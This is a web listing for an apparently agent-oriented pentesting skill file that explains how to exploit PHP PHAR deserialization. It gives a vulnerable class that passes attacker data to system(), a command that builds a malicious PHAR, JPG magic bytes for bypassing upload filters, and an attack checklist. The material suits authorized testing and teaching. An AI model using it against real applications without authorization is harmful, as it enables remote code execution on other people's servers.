Hacktricks-skills phar-deserialization

How to exploit PHP PHAR deserialization vulnerabilities. Use this skill whenever you need to test for or exploit deserialization vulnerabilities in PHP applications, especially when dealing with file inclusion via phar:// protocol, file operations like file_get_contents(), fopen(), file_exists(), md5_file(), filemtime(), or filesize(). Make sure to use this skill when you find PHP code that processes file paths with phar:// protocol or when you can control file paths in PHP applications.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/pentesting-web/file-inclusion/phar-deserialization/SKILL.MD

source content

PHAR Deserialization Exploitation

Overview

PHAR (PHP Archive) files contain metadata in serialized format. When parsed, this metadata is deserialized, which can be abused to exploit deserialization vulnerabilities in PHP code. The key advantage is that deserialization occurs even when using PHP functions that don't execute PHP code, such as:

```
file_get_contents()
```
```
fopen()
```
```
file()
```
```
file_exists()
```
```
md5_file()
```
```
filemtime()
```
```
filesize()
```

When to Use This Technique

Use PHAR deserialization exploitation when:

You can control a file path parameter in a PHP application
The application uses
```
phar://
```
protocol to read files
You find PHP classes with magic methods like
```
__destruct()
```
,
```
__wakeup()
```
, or
```
__toString()
```
The application performs file operations on user-controlled paths
You need to bypass file upload restrictions (PHAR files can include magic bytes like JPG headers)

Exploitation Workflow

Step 1: Identify the Vulnerable Class

Look for PHP classes with magic methods that execute code during deserialization:

class AnyClass {
    public $data = null;
    public function __construct($data) {
        $this->data = $data;
    }

    function __destruct() {
        system($this->data);  // This executes during deserialization
    }
}

Step 2: Create the Malicious PHAR File

Use the bundled script

scripts/create_phar.php

to generate a malicious PHAR file. This script:

Creates a new PHAR archive
Adds a dummy file to the archive
Sets a custom stub with magic bytes (to bypass file upload filters)
Embeds a serialized object as metadata
Buffers and saves the PHAR file

Step 3: Trigger the Deserialization

When the vulnerable PHP code processes your PHAR file via

phar://

protocol, the deserialization will trigger the magic method, executing your payload.

Example Exploitation

Vulnerable Application Code

<?php
class AnyClass {
    public $data = null;
    public function __construct($data) {
        $this->data = $data;
    }

    function __destruct() {
        system($this->data);
    }
}

filesize("phar://test.phar"); // Attacker controls this path

Creating the Exploit

Create the PHAR file using the bundled script:

php --define phar.readonly=0 scripts/create_phar.php

Upload or place the PHAR file where the vulnerable application can access it
Trigger the vulnerability by accessing the vulnerable endpoint with the PHAR file path

Bypassing File Upload Restrictions

The PHAR file can include magic bytes at the beginning to bypass file type restrictions. For example, adding JPG magic bytes (

\xff\xd8\xff

) makes the file appear as a valid image while still being a valid PHAR archive.

Common Magic Methods to Exploit

```
__destruct()
```
- Called when object is destroyed
```
__wakeup()
```
- Called after unserialization
```
__toString()
```
- Called when object is converted to string
```
__invoke()
```
- Called when object is called as a function
```
__call()
```
- Called when invoking inaccessible methods

Testing Checklist

Can you control a file path parameter?
Does the application use
```
phar://
```
protocol?
Are there classes with magic methods in the codebase?
Can you upload or place files on the server?
Is
```
phar.readonly
```
set to 0 (required to create PHAR files)?